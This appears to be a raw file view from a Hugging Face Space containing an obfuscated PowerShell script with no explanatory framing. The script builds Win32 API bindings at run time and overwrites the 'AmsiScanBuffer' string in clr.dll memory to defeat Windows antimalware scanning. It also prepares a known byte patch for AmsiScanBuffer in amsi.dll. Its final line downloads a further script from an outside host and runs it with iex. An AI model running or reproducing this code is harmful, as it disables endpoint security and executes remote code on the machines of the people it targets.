Spaces:
Runtime error
Runtime error
File size: 11,994 Bytes
a11a056 c979f64 493d6f1 c979f64 493d6f1 b6802d8 c979f64 493d6f1 afea32c c979f64 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 |
Set-Location $env:TEMP
${Pa`Ge`_`REAdO`NlY} = 0x02
${P`AGe`_rEA`DW`RItE} = 0x04
${pAgE`_ExECu`Te`_ReADWrI`TE} = 0x40
${pAgE`_EXeCUTE`_`REad} = 0x20
${P`AG`e_GU`Ard} = 0x100
${M`Em_`cOmm`iT} = 0x1000
${MAx`_Path} = 260
function IsReadable {
param (${prO`TecT}, ${S`TatE})
return (((${p`RotecT} -band ${PaGe_`R`E`A`dONLY}) -eq ${P`AGe_r`Ea`Don`LY} -or (${PrO`Te`cT} -band ${Pag`E_rEa`D`WRi`TE}) -eq ${pA`g`E_REAdwRi`Te} -or (${p`R`OtEct} -band ${PaGe`_ExecUTE_ReAD`w`RIte}) -eq ${pAgE_Exe`cutE_`Re`Ad`wrItE} -or (${P`ROt`ect} -band ${PagE_E`Xe`cu`TE_rE`AD}) -eq ${p`AGE_eX`e`CuTE_rEAd}) -and (${P`R`oTEcT} -band ${p`AGe`_`gUaRd}) -ne ${P`Age_`Gua`RD} -and (${ST`AtE} -band ${Mem_`cOMM`It}) -eq ${M`Em_Comm`IT})
}
function PatternMatch {
param (${b`Uf`FEr}, ${p`A`TtErn}, ${I`NDEX})
for (${I} = 0; ${i} -lt ${P`ATt`eRN}.Length; ${I}++) {
if (${b`UffEr}[${IN`deX} + ${i}] -ne ${PatT`E`RN}[${I}]) {
return ${f`Alse}
}
}
return ${T`RUE}
}
${dy`NAss`eMb`ly} = New-Object System.Reflection.AssemblyName("Win32")
${aSSEm`B`LYbU`i`LdEr} = [AppDomain]::CurrentDomain.DefineDynamicAssembly(${D`YNAS`seMB`Ly}, [Reflection.Emit.AssemblyBuilderAccess]::Run)
${Mo`duL`eb`Ui`ldER} = ${a`SSEmBL`YB`UiLDER}.DefineDynamicModule("Win32", ${f`A`lSE})
${Ty`P`ebuIl`DER} = ${ModU`Leb`UI`L`DeR}.DefineType("Win32.MEMORY_INFO_BASIC", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]${tYP`EB`UiL`der}.DefineField("BaseAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${TY`pEBUIlD`er}.DefineField("AllocationBase", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${Ty`pEBuI`LD`er}.DefineField("AllocationProtect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]${tYp`eBU`IlD`eR}.DefineField("RegionSize", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${TYpEBUI`l`dEr}.DefineField("State", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]${T`Yp`EBui`LdER}.DefineField("Protect", [Int32], [System.Reflection.FieldAttributes]::Public)
[void]${TypEb`Ui`LD`er}.DefineField("Type", [Int32], [System.Reflection.FieldAttributes]::Public)
${meMO`RY_`INfo_`B`As`ic_st`RUCt} = ${ty`peBu`ild`eR}.CreateType()
${tYp`EbUIld`Er} = ${MOd`UlEb`UiLDEr}.DefineType("Win32.SYSTEM_INFO", [System.Reflection.TypeAttributes]::Public + [System.Reflection.TypeAttributes]::Sealed + [System.Reflection.TypeAttributes]::SequentialLayout, [System.ValueType])
[void]${tYp`eBu`i`LdEr}.DefineField("wProcessorArchitecture", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]${tYpeBu`iL`dER}.DefineField("wReserved", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]${typ`Eb`U`IldEr}.DefineField("dwPageSize", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]${T`Ype`BUi`LDeR}.DefineField("lpMinimumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${TYpEbu`il`d`eR}.DefineField("lpMaximumApplicationAddress", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${Ty`peBUi`LDer}.DefineField("dwActiveProcessorMask", [IntPtr], [System.Reflection.FieldAttributes]::Public)
[void]${t`YpEB`UilD`er}.DefineField("dwNumberOfProcessors", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]${TYPE`BUi`LDeR}.DefineField("dwProcessorType", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]${Ty`PEb`UIL`DeR}.DefineField("dwAllocationGranularity", [UInt32], [System.Reflection.FieldAttributes]::Public)
[void]${tY`Peb`UilDER}.DefineField("wProcessorLevel", [UInt16], [System.Reflection.FieldAttributes]::Public)
[void]${tyP`eB`UiLD`Er}.DefineField("wProcessorRevision", [UInt16], [System.Reflection.FieldAttributes]::Public)
${s`yStEM`_`iNFo_s`T`RUcT} = ${tyPE`Bu`il`der}.CreateType()
${tYPEbUil`d`er} = ${M`oDU`l`EBuIldeR}.DefineType("Win32.Kernel32", "Public, Class")
${DlliM`p`ORTcoNsT`RUCT`or} = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
${sETlasteR`R`or} = [Runtime.InteropServices.DllImportAttribute].GetField("SetLastError")
${S`ETLasterRorc`U`StOM`AttRi`ButE} = New-Object Reflection.Emit.CustomAttributeBuilder(${d`L`LimPO`RtcOn`stRu`CToR}, "kernel32.dll", [Reflection.FieldInfo[]]@(${seTLAS`Te`R`ROR}), @(${t`Rue}))
${p`INVokEmETH`Od} = ${TYPe`BUil`D`er}.DefinePInvokeMethod("VirtualProtect", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [bool], [Type[]]@([IntPtr], [IntPtr], [Int32], [Int32].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${pi`NVok`EmETHod}.SetCustomAttribute(${S`e`T`lA`StERROR`CUS`TO`maT`TrIBuTE})
${piNvO`KEME`T`h`od} = ${t`Y`P`ebuilDEr}.DefinePInvokeMethod("GetCurrentProcess", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@(), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${piNVOke`M`E`THod}.SetCustomAttribute(${SetlAs`TE`RrOr`CuS`TOmAtTR`IbuTe})
${P`In`VO`KEME`ThOd} = ${tY`PEbu`IL`DeR}.DefinePInvokeMethod("VirtualQuery", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [IntPtr], [Type[]]@([IntPtr], [Win32.MEMORY_INFO_BASIC].MakeByRefType(), [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${p`InvOK`e`M`ethod}.SetCustomAttribute(${SeTLASTE`RRorC`U`sto`mA`TtRi`BUtE})
${PI`N`Vo`kE`meThoD} = ${typeb`U`ild`Er}.DefinePInvokeMethod("GetSystemInfo", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [void], [Type[]]@([Win32.SYSTEM_INFO].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${pin`V`OkeMEthoD}.SetCustomAttribute(${Se`TLAS`TERroR`Cu`sTOMAttRIb`U`Te})
${pI`NVo`KEM`EThoD} = ${tyP`Eb`Ui`LDeR}.DefinePInvokeMethod("GetMappedFileName", "psapi.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [System.Text.StringBuilder], [uint32]), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${p`InVokE`MeT`hOD}.SetCustomAttribute(${seT`L`ASt`eRrorCUs`ToMa`TTrIbU`TE})
${PINvO`Ke`Me`ThoD} = ${T`Y`pEbuIL`DeR}.DefinePInvokeMethod("ReadProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${p`INVOKE`MethOD}.SetCustomAttribute(${setL`AstE`R`RorcUst`Om`AtTr`ib`UtE})
${PinV`oKeMeT`h`oD} = ${ty`PeBui`LD`Er}.DefinePInvokeMethod("WriteProcessMemory", "kernel32.dll", ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static), [Reflection.CallingConventions]::Standard, [Int32], [Type[]]@([IntPtr], [IntPtr], [byte[]], [int], [int].MakeByRefType()), [Runtime.InteropServices.CallingConvention]::Winapi, [Runtime.InteropServices.CharSet]::Auto)
${p`inVO`K`eMEThoD}.SetCustomAttribute(${set`la`sTeRROrc`UStO`M`AtTriBuTE})
${KE`RNEl`32} = ${t`YpEbu`IldeR}.CreateType()
${a} = "Ams"
${B} = "iSc"
${C} = "anBuf"
${D} = "fer"
${SIg`NAt`URe} = [System.Text.Encoding]::UTF8.GetBytes(${a} + ${B} + ${c} + ${d})
${hP`Roce`Ss} = [Win32.Kernel32]::GetCurrentProcess()
${sySI`N`Fo} = New-Object Win32.SYSTEM_INFO
[void][Win32.Kernel32]::GetSystemInfo([ref]${s`YsiNFo})
${memO`RyREg`Io`NS} = @()
${aD`dReSS} = [IntPtr]::Zero
while (${Add`Re`sS}.ToInt64() -lt ${SyS`info}.lpMaximumApplicationAddress.ToInt64()) {
${meMI`N`FO} = New-Object Win32.MEMORY_INFO_BASIC
if ([Win32.Kernel32]::VirtualQuery(${ad`d`ResS}, [ref]${M`emI`NFo}, [System.Runtime.InteropServices.Marshal]::SizeOf(${MEmiN`FO}))) {
${memoR`Yr`egI`o`Ns} += ${ME`m`iNFo}
}
${ADDrE`SS} = New-Object IntPtr(${M`em`InFo}.BaseAddress.ToInt64() + ${m`EmiN`Fo}.RegionSize.ToInt64())
}
${c`o`UnT} = 0
$InitialDate=Get-Date;
foreach (${Re`gI`on} in ${ME`M`oRy`R`eGiOns}) {
if (-not (IsReadable ${reGI`ON}.Protect ${rEGi`ON}.State)) {
continue
}
${PaTh`BU`il`DER} = New-Object System.Text.StringBuilder ${m`Ax_p`ATH}
if ([Win32.Kernel32]::GetMappedFileName(${hPROC`e`ss}, ${r`EgIOn}.BaseAddress, ${pa`Thbu`IlD`eR}, ${MA`X`_PaTh}) -gt 0) {
${Pa`TH} = ${PaThBu`ILd`ER}.ToString()
if (${Pa`TH}.EndsWith("clr.dll", [StringComparison]::InvariantCultureIgnoreCase)) {
${Bu`F`FEr} = New-Object byte[] ${R`EGI`on}.RegionSize.ToInt64()
${bYTesR`E`Ad} = 0
[void][Win32.Kernel32]::ReadProcessMemory(${h`pr`OCeSs}, ${reg`i`on}.BaseAddress, ${B`UFf`ER}, ${BUf`F`er}.Length, [ref]${Byte`sRE`AD})
for (${K} = 0; ${K} -lt (${b`y`TESread} - ${S`IG`NATUre}.Length); ${K}++) {
${F`oUnD} = ${T`RUE}
for (${m} = 0; ${m} -lt ${S`i`gnAturE}.Length; ${m}++) {
if (${BU`F`FEr}[${k} + ${M}] -ne ${SI`GNa`TURE}[${M}]) {
${FO`Und} = ${f`Al`Se}
break
}
}
if (${FOu`ND}) {
${o`lDpRo`TECT} = 0
if ((${re`gi`on}.Protect -band ${Pa`g`e_`ReADWR`ite}) -ne ${pagE`_R`ea`dw`RITE}) {
[void][Win32.Kernel32]::VirtualProtect(${rEg`IOn}.BaseAddress, ${Buff`er}.Length, ${p`A`Ge_eX`E`CU`TE_rEADwr`ITe}, [ref]${OL`dP`RO`TEct})
}
${R`epL`ACEME`Nt} = New-Object byte[] ${SI`G`NAturE}.Length
${b`YtESwR`ITteN} = 0
[void][Win32.Kernel32]::WriteProcessMemory(${hPr`oc`Ess}, [IntPtr]::Add(${reg`iON}.BaseAddress, ${K}), ${REplAc`emE`NT}, ${ReP`Lac`E`mENt}.Length, [ref]${By`T`eswR`i`TTEn})
${cO`UnT}++
if ((${regi`ON}.Protect -band ${PAGE_`READWR`i`Te}) -ne ${paGE_`REaD`wriTE}) {
[void][Win32.Kernel32]::VirtualProtect(${r`egion}.BaseAddress, ${bu`F`FeR}.Length, ${rE`GION}.Protect, [ref]${OL`D`p`RotECt})
}
}
}
}
}
}
Add-Type @"
using System;using System.Runtime.InteropServices;public class Win32{[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr h,string p);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string n);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr a,UIntPtr s,uint p,out uint o);}
"@
${c`ou`NT}
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]6, 0x40, [ref]$p)
$Patch = [Byte[]](0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$FinishDate=Get-Date;
$TimeElapsed = ($FinishDate - $InitialDate).TotalSeconds;
Start-Sleep -Seconds ([math]::Round($TimeElapsed))
(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/Add-Type5.ps1')|iex |